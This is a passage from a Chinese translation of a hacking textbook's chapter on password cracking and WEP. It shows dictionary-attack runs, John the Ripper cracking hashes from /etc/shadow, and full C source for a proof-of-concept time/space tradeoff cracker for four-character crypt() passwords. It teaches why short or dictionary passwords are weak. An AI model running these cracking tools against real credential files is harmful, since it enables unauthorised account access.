Salt value is 'je'
trying word:                                  ==>   jesS3DmkteZYk
trying word:   A                              ==>   jeV7uK/S.y/KU
trying word:   A's                            ==>   jeEcn7sF7jwWU
trying word:   AOL                            ==>   jeSFGex8ANJDE
trying word:   AOL's                          ==>   jesSDhacNYUbc
trying word:   Aachen                         ==>   jeyQc3uB14q1E
trying word:   Aachen's                       ==>   je7AQSxfhvsyM
trying word:   Aaliyah                        ==>   je/vAqRJyOZvU

.:[ output trimmed ]:.

trying word:   terse                          ==>   jelgEmNGLflJ2
trying word:   tersely                        ==>   jeYfo1aImUWqg
trying word:   terseness                      ==>   jedH11z6kkEaA
trying word:   terseness's                    ==>   jedH11z6kkEaA
trying word:   terser                         ==>   jeXptBe6psF3g
trying word:   tersest                        ==>   jenhzylhDIqBA
trying word:   tertiary                       ==>   jex6uKY9AJDto
trying word:   test                           ==>   jeHEAX1m66RV.
The hash "jeHEAX1m66RV." is from the plaintext password "test". 
reader@hacking:~/booksrc $

由于单词 test 是原始密码，并且这个单词在单词文件中存在，密码散列最终会被破解。这就是为什么使用基于字典单词的密码被认为是不安全的做法。

这种攻击的缺点是，如果原始密码不是字典文件中找到的单词，密码将不会被找到。例如，如果使用像h4R%这样的非字典单词作为密码，字典攻击将无法找到它：

reader@hacking:~/booksrc $ ./crypt_test h4R% je
password "h4R%" with salt "je" hashes to ==> jeMqqfIfPNNTE
reader@hacking:~/booksrc $ ./crypt_crack /usr/share/dict/words jeMqqfIfPNNTE
Salt value is 'je'
trying word:                                  ==>   jesS3DmkteZYk
trying word:   A                              ==>   jeV7uK/S.y/KU
trying word:   A's                            ==>   jeEcn7sF7jwWU
trying word:   AOL                            ==>   jeSFGex8ANJDE
trying word:   AOL's                          ==>   jesSDhacNYUbc
trying word:   Aachen                         ==>   jeyQc3uB14q1E
trying word:   Aachen's                       ==>   je7AQSxfhvsyM
trying word:   Aaliyah                        ==>   je/vAqRJyOZvU

.:[ output trimmed ]:.

trying word:   zooms                          ==>   je8A6DQ87wHHI
trying word:   zoos                           ==>   jePmCz9ZNPwKU
trying word:   zucchini                       ==>   jeqZ9LSWt.esI
trying word:   zucchini's                     ==>   jeqZ9LSWt.esI
trying word:   zucchinis                      ==>   jeqZ9LSWt.esI
trying word:   zwieback                       ==>   jezzR3b5zwlys
trying word:   zwieback's                     ==>   jezzR3b5zwlys
trying word:   zygote                         ==>   jei5HG7JrfLy6
trying word:   zygote's                       ==>   jej86M9AG0yj2
trying word:   zygotes                        ==>   jeWHQebUlxTmo 
Couldn't find the plaintext password in the supplied wordlist.

定制的字典文件通常使用不同的语言、单词的标准修改（例如将字母转换为数字）或简单地在每个单词的末尾添加数字来创建。虽然更大的字典会产生更多的密码，但它也会花费更多的时间来处理。

极端暴力破解攻击

尝试每个可能组合的字典攻击是 极端暴力破解 攻击。虽然这种攻击在技术上能够破解每个可能的密码，但它可能需要比你的曾孙们的曾孙愿意等待的时间更长。

对于crypt()-风格的密码，有 95 个可能的输入字符，对于穷举搜索所有八字符密码，有 95⁸种可能的密码，这相当于超过七十万亿种可能的密码。这个数字增长得如此之快，是因为随着密码长度的增加，可能的密码数量呈指数增长。假设每秒可以破解 10000 次，尝试每一个密码需要大约 22875 年。将这个努力分散到多台机器和处理器上是一种可能的方法；然而，重要的是要记住，这只会实现线性加速。如果有一千台机器组合起来，每台机器每秒可以破解 10000 次，这个努力仍然需要超过 22 年。添加另一台机器实现的线性加速与增加一个字符到密码长度时密钥空间增长相比是微不足道的。

幸运的是，指数增长的逆命题也是成立的；随着密码长度的减少，可能的密码数量以指数方式减少。这意味着一个四字符的密码只有 95⁴种可能的密码。这个密钥空间只有大约 8400 万种可能的密码，在超过两小时内就可以被穷举破解（假设每秒可以破解 10000 次）。这意味着，即使像h4R%这样的密码不在任何字典中，也可以在合理的时间内被破解。

这意味着，除了避免字典单词外，密码长度也很重要。由于复杂性呈指数增长，将长度加倍以生成一个八字符密码应该会将破解密码所需的工作量降低到不合理的时间范围内。

Solar Designer 开发了一个名为 John the Ripper 的密码破解程序，该程序首先使用字典攻击，然后进行穷举暴力攻击。这个程序可能是这一类中最受欢迎的；它可以在www.openwall.com/john找到。它已经被包含在 LiveCD 中。

reader@hacking:~/booksrc $ john

John the Ripper  Version 1.6  Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]
-single                   "single crack" mode
-wordfile:FILE -stdin     wordlist mode, read words from FILE or stdin
-rules                    enable rules for wordlist mode
-incremental[:MODE]       incremental mode [using section MODE]
-external:MODE            external mode or word filter
-stdout[:LENGTH]          no cracking, just write words to stdout
-restore[:FILE]           restore an interrupted session [from FILE]
-session:FILE             set session file name to FILE
-status[:FILE]            print status of a session [from FILE]
-makechars:FILE           make a charset, FILE will be overwritten
-show                     show cracked passwords
-test                     perform a benchmark
-users:[-]LOGIN|UID[,..]  load this (these) user(s) only
-groups:[-]GID[,..]       load users of this (these) group(s) only
-shells:[-]SHELL[,..]     load users with this (these) shell(s) only
-salts:[-]COUNT           load salts with at least COUNT passwords only
-format:NAME              force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL            enable memory saving, at LEVEL 1..3
reader@hacking:~/booksrc $ sudo tail -3 /etc/shadow
matrix:$1$zCcRXVsm$GdpHxqC9epMrdQcayUx0//:13763:0:99999:7:::
jose:$1$pRS4.I8m$Zy5of8AtD800SeMgm.2Yg.:13786:0:99999:7:::
reader:U6aMy0wojraho:13764:0:99999:7:::
reader@hacking:~/booksrc $ sudo john /etc/shadow
Loaded 2 passwords with 2 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:01 0% (2)  c/s: 5522  trying: koko
guesses: 0  time: 0:00:00:03 6% (2)  c/s: 5489  trying: exports
guesses: 0  time: 0:00:00:05 10% (2)  c/s: 5561  trying: catcat
guesses: 0  time: 0:00:00:09 20% (2)  c/s: 5514  trying: dilbert!
guesses: 0  time: 0:00:00:10 22% (2)  c/s: 5513  trying: redrum3
testing7         (jose)
guesses: 1  time: 0:00:00:14 44% (2)  c/s: 5539  trying: KnightKnight
guesses: 1  time: 0:00:00:17 59% (2)  c/s: 5572  trying: Gofish! 
Session aborted

在这个输出中，账户 jose 显示的密码是testing7。

哈希查找表

另一个有趣的密码破解想法是使用巨大的哈希查找表。如果所有可能的密码的哈希值都预先计算并存储在某个可搜索的数据结构中，任何密码都可以在搜索所需的时间内被破解。假设使用二分搜索，这个时间将是 O(log[2] N)，其中N是条目数。由于N在八字符密码的情况下是 95⁸，这相当于 O(8 log[2] 95)，这相当快。

然而，这样的哈希查找表需要大约 100,000 太字节（TB）的存储空间。此外，密码散列算法的设计考虑了这种攻击，并通过盐值来减轻它。由于多个明文密码会散列成具有不同盐的不同密码散列，因此必须为每个盐创建一个单独的查找表。基于 DES 的crypt()函数有 4,096 种可能的盐值，这意味着即使对于较小的密钥空间，例如所有可能的四字符密码，哈希查找表也变得不切实际。使用固定的盐，所有可能的四字符密码的单个查找表所需的存储空间大约为 1 吉字节（GB），但由于盐值，单个明文密码有 4,096 种可能的哈希，需要 4,096 个不同的表。这使得所需的存储空间增加到大约 4.6TB，这大大阻止了此类攻击。

密码概率矩阵

计算能力和存储空间之间的权衡无处不在。这可以在计算机科学的最基本形式和日常生活中看到。MP3 文件使用压缩来存储高质量的声音文件，在相对较小的空间内，但计算资源的需求增加。便携式计算器通过为正弦和余弦等函数维护查找表来使用这种权衡，以节省计算器进行繁重计算。

这种权衡也可以应用于密码学，被称为时间/空间权衡攻击。虽然赫尔曼（Hellman）针对此类攻击的方法可能更有效率，但以下源代码应该更容易理解。尽管如此，一般原则始终相同：尝试在计算能力和存储空间之间找到最佳平衡点，以便在合理的时间内，使用合理的空间完成穷举暴力攻击。不幸的是，盐的困境仍然存在，因为这种方法仍然需要某种形式的存储。然而，对于crypt()风格的密码散列，只有 4,096 种可能的盐，因此可以通过减少所需的存储空间来减轻这个问题的影响，尽管有 4,096 的乘数，但仍然保持合理。

此方法使用了一种损失压缩的形式。在输入密码散列时，而不是有一个精确的散列查找表，将返回几千个可能的明文值。这些值可以快速检查以收敛到原始明文密码，而损失压缩允许大幅减少空间。在下面的演示代码中，使用了所有可能的四字符密码（带有固定的盐）的密钥空间。所需的存储空间减少了 88%，与完整的散列查找表（带有固定的盐）相比，必须暴力破解的密钥空间减少了大约 1,018 倍。在每秒 10,000 次破解的假设下，此方法可以在不到八秒内破解任何四字符密码（带有固定的盐），与需要两小时才能穷举破解相同密钥空间相比，这是一个相当大的速度提升。

此方法构建了一个三维二进制矩阵，将散列值的部分与明文值的部分相关联。在 x 轴上，明文被分成两个对：前两个字符和后两个字符。可能的值被枚举到一个 95²的二进制向量中，长度为 9,025 位（大约 1,129 字节）。在 y 轴上，密文被分成四个三字符块。这些值以相同的方式沿列枚举，但实际上只使用了第三个字符的四个位。这意味着有 64².4，或 16,384 列。z 轴的存在只是为了保持八个不同的二维矩阵，因此对于每个明文对，都有四个。

基本思路是将明文分成两个成对的值，这些值沿着一个向量进行枚举。每个可能的明文都会被散列成密文，密文用于找到矩阵的适当列。然后，矩阵行中的明文枚举位被打开。当密文值被缩减成更小的块时，冲突是不可避免的。

明文	散列
测试	jeHEAX1m66RV.
!J)h	jeHEA38vqlkkQ
".F+	jeHEA1Tbde5FE
"8,J	jeHEAnX8kQK3I

在这种情况下，HEA对应的列将打开与明文对te, !J, "., 和 "8对应的位，因为这些明文/散列对被添加到矩阵中。

在矩阵完全填满后，当输入一个如 jeHEA38vqlkkQ 这样的哈希时，将查找 HEA 的列，二维矩阵将返回明文前两个字符的值 te, !J, "., 和 "8。对于前两个字符，有四个这样的矩阵，使用从字符 2 到 4、4 到 6、6 到 8 和 8 到 10 的密文子串，每个矩阵都有不同的一组可能的前两个字符明文值向量。每个向量被提取出来，并通过位与操作组合。这将仅留下与每个密文子串中列出的明文对对应的位被打开。对于明文最后两个字符也有四个这样的矩阵。

矩阵的大小是由鸽巢原理确定的。这是一个简单的原理，其表述为：如果将 k + 1 个对象放入 k 个盒子中，至少有一个盒子将包含两个对象。因此，为了获得最佳结果，目标是让每个向量中的 1s 数量略少于一半。由于矩阵中将放入 95⁴，即 81,450,625 个条目，因此需要大约两倍数量的空位来实现 50% 的饱和度。由于每个向量有 9,025 个条目，因此应有大约 (95⁴ · 2) / 9025 列。这计算出来大约是 18,000 列。由于正在使用三个字符的密文子串作为列，因此前两个字符和第三个字符的前四个位被用来提供 64² · 4，即大约 16,000 列（密文哈希的每个字符都有 64 种可能的值）。这应该足够接近，因为当位被添加两次时，重叠被忽略。在实践中，每个向量最终大约有 42% 的 1s 饱和度。

由于为单个密文提取了四个向量，因此每个向量中任何一位为 1 的概率大约是 0.42⁴，即大约 3.11%。这意味着，平均而言，明文前两个字符的 9,025 种可能性减少了大约 97%，变为 280 种可能性。这也适用于最后两个字符，提供了大约 280²，即 78,400 个可能的明文值。在每秒 10,000 次破解的假设下，这个减少后的密钥空间将在 8 秒内被检查完毕。

当然，这种方法也有缺点。首先，创建矩阵所需的时间至少与原始的暴力攻击所需的时间一样长；然而，这是一个一次性成本。此外，盐值仍然倾向于防止任何类型的存储攻击，即使是在减少存储空间需求的情况下。

以下两个源代码列表可以用来创建密码概率矩阵并使用它破解密码。第一个列表将生成一个可以用来破解所有可能的四个字符密码（盐值为 je）的矩阵。第二个列表将使用生成的矩阵实际进行密码破解。

ppm_gen.c

/*********************************************************\
*  Password Probability Matrix   *    File: ppm_gen.c     *
***********************************************************
*                                                         *
*  Author:        Jon Erickson <matrix@phiral.com>        *
*  Organization:  Phiral Research Laboratories            *
*                                                         *
*  This is the generate program for the PPM proof of      *
*  concept.  It generates a file called 4char.ppm, which  *
*  contains information regarding all possible 4-         *
*  character passwords salted with 'je'.  This file can   *
*  be used to quickly crack passwords found within this   *
*  keyspace with the corresponding ppm_crack.c program.   *
*                                                         *
\*********************************************************/

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define HEIGHT 16384
#define WIDTH  1129
#define DEPTH  8
#define SIZE HEIGHT * WIDTH * DEPTH

/* Map a single hash byte to an enumerated value. */
int enum_hashbyte(char a) {
   int i, j;
   i = (int)a;
   if((i >= 46) && (i <= 57))
      j = i - 46;
   else if ((i >= 65) && (i <= 90))
      j = i - 53;
   else if ((i >= 97) && (i <= 122))
      j = i - 59;
   return j;
}

/* Map 3 hash bytes to an enumerated value. */
int enum_hashtriplet(char a, char b, char c) {
   return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));
}
/* Barf a message and exit. */
void barf(char *message, char *extra) {
   printf(message, extra);
   exit(1);
}

/* Generate a 4-char.ppm file with all possible 4-char passwords (salted w/ je). */
int main() {
   char plain[5];
   char *code, *data;
   int i, j, k, l;
   unsigned int charval, val;
   FILE *handle;
   if (!(handle = fopen("4char.ppm", "w")))
      barf("Error: Couldn't open file '4char.ppm' for writing.\n", NULL);

   data = (char *) malloc(SIZE);
   if (!(data))
      barf("Error: Couldn't allocate memory.\n", NULL);

   for(i=32; i<127; i++) {
      for(j=32; j<127; j++) {
         printf("Adding %c%c** to 4char.ppm..\n", i, j);
         for(k=32; k<127; k++) {
            for(l=32; l<127; l++) {

               plain[0]  = (char)i; // Build every
               plain[1]  = (char)j; // possible 4-byte
               plain[2]  = (char)k; // password.
               plain[3]  = (char)l;
               plain[4]  = '\0';
               code = crypt((const char *)plain, (const char *)"je"); // Hash it.

               /* Lossfully store statistical info about the pairings. */
               val = enum_hashtriplet(code[2], code[3], code[4]); // Store info about
 bytes 2-4.

               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = HEIGHT + enum_hashtriplet(code[4], code[5], code[6]); // bytes 4-6
               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = (2 * HEIGHT) + enum_hashtriplet(code[6], code[7], code[8]); //
 bytes 6-8
               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = (3 * HEIGHT) + enum_hashtriplet(code[8], code[9], code[10]);
 // bytes 8-10
               charval = (i-32)*95 + (j-32); // First 2 plaintext chars
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
            }
         }
      }
   }
   printf("finished.. saving..\n");
   fwrite(data, SIZE, 1, handle);
   free(data);
   fclose(handle); 
}

第一段代码，ppm_gen.c，可以用来生成一个四字符密码概率矩阵，如下面的输出所示。传递给 GCC 的-O3选项告诉它在编译时优化代码以提高速度。

reader@hacking:~/booksrc $ gcc -O3 -o ppm_gen ppm_gen.c -lcrypt
reader@hacking:~/booksrc $ ./ppm_gen
Adding   ** to 4char.ppm..
Adding  !** to 4char.ppm..
Adding  "** to 4char.ppm..

.:[ output trimmed ]:.

Adding ~|** to 4char.ppm..
Adding ~}** to 4char.ppm..
Adding ~~** to 4char.ppm..
finished.. saving..
@hacking:~ $ ls -lh 4char.ppm
-rw-r--r-- 1 142M 2007-09-30 13:56 4char.ppm
reader@hacking:~/booksrc $

142MB 的 4char.ppm 文件包含了每个可能的四字符密码的明文和哈希数据之间的松散关联。然后，这些数据可以由下一个程序用来快速破解那些能够阻止字典攻击的四字符密码。

ppm_crack.c

/*********************************************************\
*  Password Probability Matrix   *    File: ppm_crack.c   *
***********************************************************
*                                                         *
*  Author:        Jon Erickson <matrix@phiral.com>        *
*  Organization:  Phiral Research Laboratories            *
*                                                         *
*  This is the crack program for the PPM proof of concept.*
*  It uses an existing file called 4char.ppm, which       *
*  contains information regarding all possible 4-         *
*  character passwords salted with 'je'.  This file can   *
*  be generated with the corresponding ppm_gen.c program. *
*                                                         *
\*********************************************************/

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define HEIGHT 16384
#define WIDTH  1129
#define DEPTH 8
#define SIZE HEIGHT * WIDTH * DEPTH
#define DCM HEIGHT * WIDTH

/* Map a single hash byte to an enumerated value. */
int enum_hashbyte(char a) {
   int i, j;
   i = (int)a;
   if((i >= 46) && (i <= 57))
      j = i - 46;
   else if ((i >= 65) && (i <= 90))
      j = i - 53;
   else if ((i >= 97) && (i <= 122))
      j = i - 59;
   return j;
}

/* Map 3 hash bytes to an enumerated value. */
int enum_hashtriplet(char a, char b, char c) {
   return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));
}

/* Merge two vectors. */
void merge(char *vector1, char *vector2) {
   int i;
   for(i=0; i < WIDTH; i++)
      vector1[i] &= vector2[i];
}

/* Returns the bit in the vector at the passed index position */
int get_vector_bit(char *vector, int index) {
   return ((vector[(index/8)]&(1<<(index%8)))>>(index%8));
}

/* Counts the number of plaintext pairs in the passed vector */
int count_vector_bits(char *vector) {
   int i, count=0;
   for(i=0; i < 9025; i++)
      count += get_vector_bit(vector, i);
   return count;
}

/* Print the plaintext pairs that each ON bit in the vector enumerates. */
void print_vector(char *vector) {
   int i, a, b, val;
   for(i=0; i < 9025; i++) {
      if(get_vector_bit(vector, i) == 1) { // If bit is on,
         a = i / 95;                  // calculate the
         b = i - (a * 95);            // plaintext pair
         printf("%c%c ",a+32, b+32);  // and print it.
      }
   }
   printf("\n");
}

/* Barf a message and exit. */
void barf(char *message, char *extra) {
   printf(message, extra);
   exit(1);
}

/* Crack a 4-character password using generated 4char.ppm file. */
int main(int argc, char *argv[]) {
  char *pass, plain[5];
  unsigned char bin_vector1[WIDTH], bin_vector2[WIDTH], temp_vector[WIDTH];
  char prob_vector1[2][9025];
  char prob_vector2[2][9025];
  int a, b, i, j, len, pv1_len=0, pv2_len=0;
  FILE *fd;

  if(argc < 1)
     barf("Usage: %s <password hash>  (will use the file 4char.ppm)\n", argv[0]);

  if(!(fd = fopen("4char.ppm", "r")))
     barf("Fatal: Couldn't open PPM file for reading.\n", NULL);

  pass = argv[1]; // First argument is password hash

  printf("Filtering possible plaintext bytes for the first two characters:\n");

  fseek(fd,(DCM*0)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET);
  fread(bin_vector1, WIDTH, 1, fd); // Read the vector associating bytes 2-4 of hash.

  len = count_vector_bits(bin_vector1);
  printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len,
 len*100.0/
9025.0);

  fseek(fd,(DCM*1)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 4-6 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the first vector.

  len = count_vector_bits(bin_vector1);
  printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*2)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 6-8 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the first two vectors.

  len = count_vector_bits(bin_vector1);
  printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*3)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associatind bytes 8-10 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the othes vectors.

  len = count_vector_bits(bin_vector1);
  printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  printf("Possible plaintext pairs for the first two bytes:\n");
  print_vector(bin_vector1);

  printf("\nFiltering possible plaintext bytes for the last two characters:\n");

  fseek(fd,(DCM*4)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET);
  fread(bin_vector2, WIDTH, 1, fd); // Read the vector associating bytes 2-4 of hash.

  len = count_vector_bits(bin_vector2);
  printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len,
 len*100.0/
9025.0);

  fseek(fd,(DCM*5)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 4-6 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the first vector.

  len = count_vector_bits(bin_vector2);
  printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*6)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 6-8 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the first two vectors.

  len = count_vector_bits(bin_vector2);
  printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*7)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associatind bytes 8-10 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the othes vectors.

  len = count_vector_bits(bin_vector2);
  printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  printf("Possible plaintext pairs for the last two bytes:\n");
  print_vector(bin_vector2);
  printf("Building probability vectors...\n");
  for(i=0; i < 9025; i++) { // Find possible first two plaintext bytes.
    if(get_vector_bit(bin_vector1, i)==1) {;
      prob_vector1[0][pv1_len] = i / 95;
      prob_vector1[1][pv1_len] = i - (prob_vector1[0][pv1_len] * 95);
      pv1_len++;
    }
  }
  for(i=0; i < 9025; i++) { // Find possible last two plaintext bytes.
    if(get_vector_bit(bin_vector2, i)) {
      prob_vector2[0][pv2_len] = i / 95;
      prob_vector2[1][pv2_len] = i - (prob_vector2[0][pv2_len] * 95);
      pv2_len++;
    }
  }

  printf("Cracking remaining %d possibilites..\n", pv1_len*pv2_len);
  for(i=0; i < pv1_len; i++) {
    for(j=0; j < pv2_len; j++) {
      plain[0] = prob_vector1[0][i] + 32;
      plain[1] = prob_vector1[1][i] + 32;
      plain[2] = prob_vector2[0][j] + 32;
      plain[3] = prob_vector2[1][j] + 32;
      plain[4] = 0;
      if(strcmp(crypt(plain, "je"), pass) == 0) {
        printf("Password :  %s\n", plain);
        i = 31337;
        j = 31337;
      }
    }
  }
  if(i < 31337)
    printf("Password wasn't salted with 'je' or is not 4 chars long.\n");

  fclose(fd); 
}

第二段代码，ppm_crack.c，可以在几秒钟内破解h4R%这个棘手的密码：

reader@hacking:~/booksrc $ ./crypt_test h4R% je
password "h4R%" with salt "je" hashes to ==> jeMqqfIfPNNTE
reader@hacking:~/booksrc $ gcc -O3 -o ppm_crack ppm_crack.c -lcrypt
reader@hacking:~/booksrc $ ./ppm_crack jeMqqfIfPNNTE
Filtering possible plaintext bytes for the first two characters:
only 1 vector of 4:     3801 plaintext pairs, with 42.12% saturation
vectors 1 AND 2 merged: 1666 plaintext pairs, with 18.46% saturation
first 3 vectors merged: 695 plaintext pairs, with 7.70% saturation
all 4 vectors merged:   287 plaintext pairs, with 3.18% saturation
Possible plaintext pairs for the first two bytes:
 4  9  N !& !M !Q "/ "5 "W #K #d #g #p $K $O $s %) %Z %\ %r &( &T '- '0 '7 'D
'F (  (v (| )+ ). )E )W *c *p *q *t *x +C -5 -A -[ -a .% .D .S .f /t 02 07 0? 
0e 0{ 0| 1A 1U 1V 1Z 1d 2V 2e 2q 3P 3a 3k 3m 4E 4M 4P 4X 4f 6  6, 6C 7: 7@ 7S 
7z 8F 8H 9R 9U 9_ 9~ :- :q :s ;G ;J ;Z ;k <! <8 =! =3 =H =L =N =Y >V >X ?1 @#
@W @v @| AO B/ B0 BO Bz C( D8 D> E8 EZ F@ G& G? Gj Gy H4 I@ J  JN JT JU Jh Jq 
Ks Ku M) M{ N, N: NC NF NQ Ny O/ O[ P9 Pc Q! QA Qi Qv RA Sg Sv T0 Te U& U> UO 
VT V[ V] Vc Vg Vi W: WG X" X6 XZ X` Xp YT YV Y^ Yl Yy Y{ Za $ [* [9 [m [z \" \
+ \C \O \w  }+ }? }y ~L ~m 

Filtering possible plaintext bytes for the last two characters:
only 1 vector of 4:     3821 plaintext pairs, with 42.34% saturation
vectors 1 AND 2 merged: 1677 plaintext pairs, with 18.58% saturation
first 3 vectors merged: 713 plaintext pairs, with 7.90% saturation
all 4 vectors merged:   297 plaintext pairs, with 3.29% saturation
Possible plaintext pairs for the last two bytes:
 !  & != !H !I !K !P !X !o !~ "r "{ "} #% #0 $5 $] %K %M %T &" &% &( &0 &4 &I 
&q &} 'B 'Q 'd )j )w *I *] *e *j *k *o *w *| +B +W ,' ,J ,V -z .  .$ .T /' /_ 
0Y 0i 0s 1! 1= 1l 1v 2- 2/ 2g 2k 3n 4K 4Y 4\ 4y 5- 5M 5O 5} 6+ 62 6E 6j 7* 74 
8E 9Q 9\ 9a 9b :8 :; :A :H :S :w ;" ;& ;L <L <m <r <u =, =4 =v >v >x ?& ?` ?j 
?w @0 A* B  B@ BT C8 CF CJ CN C} D+ D? DK Dc EM EQ FZ GO GR H) Hj I: I> J( J+ 
J3 J6 Jm K# K) K@ L, L1 LT N* NW N` O= O[ Ot P: P\ Ps Q- Qa R% RJ RS S3 Sa T! 
T$ T@ TR T_ Th U" U1 V* V{ W3 Wy Wz X% X* Y* Y? Yw Z7 Za Zh Zi Zm [F \( \3 \5 \
_ \a \b \| ]$ ]. ]2 ]? ]d ^ ^~ `1 `F `f `y a8 a= aI aK az b, b- bS bz c( cg dB 
e, eF eJ eK eu fT fW fo g( g> gW g\ h$ h9 h: h@ hk i? jN ji jn k= kj l7 lo m< 
m= mT me m| m} n% n? n~ o  oF oG oM p" p9 p\ q} r6 r= rB sA sN s{ s~ tX tp u  
u2 uQ uU uk v# vG vV vW vl w* w> wD wv x2 xA y: y= y? yM yU yX zK zv {# {) {= 
{O {m |I |Z }. }; }d ~+ ~C ~a 
Building probability vectors...
Cracking remaining 85239 possibilites..
Password :  h4R%
reader@hacking:~/booksrc $

这些程序是概念验证型黑客攻击，利用了哈希函数提供的位扩散。还有其他时间-空间权衡攻击，其中一些已经变得相当流行。RainbowCrack 是一个流行的工具，它支持多种算法。如果你想了解更多，请咨询互联网。

无线 802.11b 加密

无线 802.11b 的安全性一直是一个大问题，主要是因为其缺乏安全性。用于无线的有线等效保密（WEP）的弱点对整体的不安全性贡献很大。还有一些其他细节，在无线部署过程中有时会被忽略，也可能导致重大漏洞。

无线网络存在于第 2 层是这些细节之一。如果无线网络没有被 VLAN 隔离或防火墙保护，那么与无线接入点关联的攻击者可以通过 ARP 重定向将所有有线网络流量重定向到无线网络。这一点，加上将无线接入点连接到内部私有网络的倾向，可能导致一些严重的安全漏洞。

当然，如果启用了 WEP，只有具有正确 WEP 密钥的客户端才能被允许与接入点关联。如果 WEP 是安全的，那么就不应该有任何关于恶意攻击者关联并造成混乱的担忧。这引发了一个问题：“WEP 有多安全？”

有线等效保密

WEP 原本是一个旨在提供与有线接入点相当安全性的加密方法。它最初设计为 40 位密钥；后来，WEP2 出现，将密钥大小增加到 104 位。所有的加密都是基于每个数据包进行的，因此每个数据包本质上是一个单独的明文消息，需要发送。这个数据包将被称为M。

首先，计算消息 M 的校验和，以便稍后可以检查消息的完整性。这是使用名为 CRC32 的 32 位循环冗余校验函数完成的。这个校验和将被称为CS，所以 CS = CRC32(M)。这个值将被附加到消息的末尾，从而构成明文消息 P：

![图片图 0x700-2。现在，需要加密明文消息。这是使用 RC4 完成的，RC4 是一种流密码。这个密码，初始化时使用种子值，可以生成一个密钥流，这只是一个任意长度的伪随机字节流。WEP 使用初始化向量（IV）作为种子值。IV 为每个数据包生成 24 位。一些较老的 WEP 实现简单地使用 IV 的顺序值，而其他一些则使用某种形式的伪随机化器。无论如何选择 24 位的初始化向量（IV），它们都会被添加到 WEP 密钥之前。（这 24 位的 IV 包含在 WEP 密钥大小中，这是一种巧妙的营销策略；当供应商谈论 64 位或 128 位的 WEP 密钥时，实际密钥只有 40 位和 104 位，分别与 24 位的 IV 结合。）IV 和 WEP 密钥一起构成种子值，这个值将被称为 S。

图 0x700-3。

然后，将种子值 S 输入到 RC4 中，这将生成一个密钥流。这个密钥流与明文消息 P 进行 XOR 运算，以产生密文 C。IV 被添加到密文之前，整个内容被另一个头部封装，并通过无线电链路发送出去。

图 0x700-4。

